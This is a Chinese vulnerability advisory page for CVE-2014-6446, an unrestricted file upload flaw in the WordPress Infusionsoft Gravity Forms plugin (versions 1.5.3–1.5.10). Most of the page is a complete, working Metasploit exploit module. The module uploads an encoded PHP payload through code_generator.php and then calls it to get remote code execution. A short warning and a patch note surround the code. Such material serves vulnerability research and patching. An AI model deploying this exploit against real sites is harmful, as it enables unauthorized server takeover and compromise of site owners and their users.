Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / WordPress Infusionsoft Gravity Forms插件多个安全漏洞(CVE-2014-6446)

发布日期:2014-10-09
更新日期:2014-10-13受影响系统:
WordPress Infusionsoft 1.5.3 - 1.5.10
描述:
BUGTRAQ  ID: 70317
 CVE(CAN) ID: CVE-2014-6446 WordPress Infusionsoft可以用Infusionsoft集成Gravity Forms插件。Infusionsoft Gravity Forms 插件1.5.3-1.5.10版本没有正确限制访问,这可使远程攻击者通过向utilities/code_generator.php发送请求利用此漏洞,上传任意文件并执行任意PHP代码。<*来源:us3r777
 *>测试方法:警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ## require "msf/core" class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking include Msf::HTTP::Wordpress
 include Msf::Exploit::FileDropper def initialize(info = {})
   super(update_info(info,
     "Name"         => "Wordpress InfusionSoft Upload Vulnerability",
     "Description"    => %q{
       This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
       Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
       upload and remote code execution.
     },
     "Author"       =>
       [
         "g0blin",                    # Vulnerability Discovery
         "us3r777 <us3r777@n0b0.so>"  # Metasploit module
       ],
     "License"        => MSF_LICENSE,
     "References"   =>
       [
         ["CVE", "2014-6446"],
         ["URL", "http://research.g0blin.co.uk/cve-2014-6446/"],
       ],
     "Privileged"   => false,
     "Platform"     => "php",
     "Arch"         => ARCH_PHP,
     "Targets"        => [["Infusionsoft 1.5.3 - 1.5.10", {}]],
     "DisclosureDate" => "Sep 25 2014",
     "DefaultTarget"  => 0)
   )
 end def check
   res = send_request_cgi(
     "uri"    => normalize_uri(wordpress_url_plugins, "infusionsoft", "Infusionsoft", "utilities", "code_generator.php")
   )   if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
     return Exploit::CheckCode::Detected
   end   Exploit::CheckCode::Safe
 end def exploit
   php_pagename = rand_text_alpha(8 + rand(8)) + ".php"
   res = send_request_cgi({
     "uri"     => normalize_uri(wordpress_url_plugins, "infusionsoft",
                      "Infusionsoft", "utilities", "code_generator.php"),
     "method"    => "POST",
     "vars_post" =>
     {
       "fileNamePattern" => php_pagename,
       "fileTemplate"    => payload.encoded
     }
   })   if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
     print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
     register_files_for_cleanup(php_pagename)
   else
     fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
   end   print_status("#{peer} - Calling payload ...")
   send_request_cgi({
     "uri"     => normalize_uri(wordpress_url_plugins, "infusionsoft",
                      "Infusionsoft", "utilities", php_pagename)
   }, 2)
 end end建议:
厂商补丁:WordPress
 ---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:https://wordpress.org/plugins/infusionsoft/changelog/